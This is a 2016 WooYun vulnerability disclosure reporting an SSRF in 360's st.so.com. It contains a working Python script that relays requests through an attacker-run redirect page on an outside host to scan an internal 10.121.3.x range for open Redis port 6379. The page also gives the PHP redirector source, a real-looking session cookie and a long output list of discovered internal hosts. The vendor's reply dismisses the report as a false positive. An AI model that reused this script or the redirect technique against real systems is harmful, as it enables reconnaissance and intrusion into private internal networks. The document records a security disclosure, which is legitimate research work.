当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0229611

漏洞标题:360某处ssrf漏洞可探测内网信息(附内网6379探测脚本)

相关厂商:奇虎360

漏洞作者: Sunshie

提交时间:2016-07-15 15:38

修复时间:2016-07-15 16:15

公开时间:2016-07-15 16:15

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-07-15: 细节已通知厂商并且等待厂商处理中
2016-07-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

漏洞地址:http://st.so.com

360.png


利用302绕过http协议限制

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2016-07-05 20:55:30
# @Last Modified by: Lcy
import requests
import threading
import Queue
import random
import time
url = "http://st.so.com/stu"
threads_count = 3
que = Queue.Queue()
lock = threading.Lock()
threads = []
ip = "10.121.3."
def getIp():
return str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))
headers = {
"Cache-Control":"max-age=0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"User-Agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36",
"Cookie": "__guid=6491553.4279294988408965000.1467944097350.527; PHPSESSID=d88gvotjet30c0cp28iuv1s771; count=45",
"Content-Type":"application/x-www-form-urlencoded",
"X-Forwarded-For":getIp(),
}
for i in range(1,255):
que.put(ip + str(i))
def run():
while que.qsize() > 0:
ip = que.get()
try:
payload = "http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg".format(
ip=ip,
port="65321")
param = {"imgurl":payload}
r = requests.post(url,data=param,headers = headers,timeout=2.2)
try:
payload = "http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg".format(
ip=ip,
port="6379")
param = {"imgurl":payload}
r = requests.post(url,data=param,headers=headers,timeout=2.2)
lock.acquire()
print ip
lock.release()
except :
lock.acquire()
print "{ip} 6379 Open".format(ip=ip)
lock.release()
except:
pass
for i in range(threads_count):
t = threading.Thread(target=run)
threads.append(t)
t.setDaemon(True)
t.start()
while que.qsize() > 0:
time.sleep(1.0)


exp.php源码:

<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>


ssrf.png


10.121.3.1
10.121.3.2
10.121.3.3
10.121.3.4
10.121.3.5
10.121.3.6
10.121.3.9 6379 Open
10.121.3.11
10.121.3.14
10.121.3.13
10.121.3.15
10.121.3.18
10.121.3.16 6379 Open
10.121.3.21
10.121.3.20
10.121.3.24
10.121.3.23 6379 Open
10.121.3.25 6379 Open
10.121.3.28
10.121.3.29
10.121.3.32 6379 Open
10.121.3.34
10.121.3.35
10.121.3.36
10.121.3.37
10.121.3.38
10.121.3.39
10.121.3.41
10.121.3.42
10.121.3.40 6379 Open
10.121.3.43 6379 Open
10.121.3.45 6379 Open
10.121.3.47
10.121.3.49
10.121.3.51
10.121.3.48 6379 Open
10.121.3.53
10.121.3.55
10.121.3.54
10.121.3.56
10.121.3.57
10.121.3.58
10.121.3.59
10.121.3.61
10.121.3.60
10.121.3.62
10.121.3.63
10.121.3.64
10.121.3.65
10.121.3.66
10.121.3.67
10.121.3.68
10.121.3.69
10.121.3.70
10.121.3.71
10.121.3.72
10.121.3.73
10.121.3.74
10.121.3.75
10.121.3.76
10.121.3.77
10.121.3.79
10.121.3.78
10.121.3.80
10.121.3.82
10.121.3.81
10.121.3.83
10.121.3.84
10.121.3.85
10.121.3.86
10.121.3.87
10.121.3.88
10.121.3.89
10.121.3.90
10.121.3.91
10.121.3.92
10.121.3.93
10.121.3.94
10.121.3.95
10.121.3.96
10.121.3.97
10.121.3.98
10.121.3.99
10.121.3.100
10.121.3.101
10.121.3.102
10.121.3.103
10.121.3.104
10.121.3.105
10.121.3.106
10.121.3.107
10.121.3.108
10.121.3.109
10.121.3.110
10.121.3.111
10.121.3.112
10.121.3.113
10.121.3.114
10.121.3.115
10.121.3.116
10.121.3.117
10.121.3.118
10.121.3.119
10.121.3.120
10.121.3.121
10.121.3.122
10.121.3.123
10.121.3.124
10.121.3.125
10.121.3.126
10.121.3.127
10.121.3.128
10.121.3.129
10.121.3.130
10.121.3.131
10.121.3.132
10.121.3.133
10.121.3.134
10.121.3.135
10.121.3.136
10.121.3.137
10.121.3.138
10.121.3.139
10.121.3.140
10.121.3.141
10.121.3.142
10.121.3.143
10.121.3.144
10.121.3.145
10.121.3.146
10.121.3.147
10.121.3.148
10.121.3.149
10.121.3.150
10.121.3.151
10.121.3.152
10.121.3.153
10.121.3.154
10.121.3.155
10.121.3.156
10.121.3.157
10.121.3.158
10.121.3.159
10.121.3.160
10.121.3.161
10.121.3.162
10.121.3.163
10.121.3.164
10.121.3.165
10.121.3.166
10.121.3.167
10.121.3.168
10.121.3.170
10.121.3.169
10.121.3.171
10.121.3.172
10.121.3.173
10.121.3.174
10.121.3.175
10.121.3.176
10.121.3.177
10.121.3.178
10.121.3.179
10.121.3.180
10.121.3.181
10.121.3.182
10.121.3.183
10.121.3.184
10.121.3.185
10.121.3.186
10.121.3.187
10.121.3.188
10.121.3.189
10.121.3.190
10.121.3.191
10.121.3.192
10.121.3.193
10.121.3.194
10.121.3.195
10.121.3.196
10.121.3.197
10.121.3.198
10.121.3.199
10.121.3.200
10.121.3.201
10.121.3.202
10.121.3.203
10.121.3.204
10.121.3.205
10.121.3.206
10.121.3.207
10.121.3.208
10.121.3.209
10.121.3.210
10.121.3.211
10.121.3.212
10.121.3.213
10.121.3.214
10.121.3.215
10.121.3.216
10.121.3.217
10.121.3.218
10.121.3.219
10.121.3.220
10.121.3.221
10.121.3.223
10.121.3.222
10.121.3.224
10.121.3.225
10.121.3.226
10.121.3.227
10.121.3.228
10.121.3.229
10.121.3.230
10.121.3.231
10.121.3.232
10.121.3.233
10.121.3.234
10.121.3.235
10.121.3.236
10.121.3.237
10.121.3.238
10.121.3.239
10.121.3.240
10.121.3.241
10.121.3.242
10.121.3.243
10.121.3.244
10.121.3.245
10.121.3.246
10.121.3.247
10.121.3.248
10.121.3.249
10.121.3.250
10.121.3.251
10.121.3.252
10.121.3.253
10.121.3.254


就不深入利用了

漏洞证明:

ssrf.png


修复方案:

版权声明:转载请注明来源 Sunshie@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-07-15 16:15

厂商回复:

感谢您关注360产品安全,该漏洞属于误报问题。有疑问请360SRC官方渠道联系,有专人跟进。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-07-15 15:47 | 小骨 ( 路人 | Rank:4 漏洞数:1 | 歡笑中,幾多淒愴歲月裏苦挨。風雨中,幾多...)

    前排

  2. 2016-07-15 15:48 | zhiher ( 路人 | Rank:16 漏洞数:4 )

    前排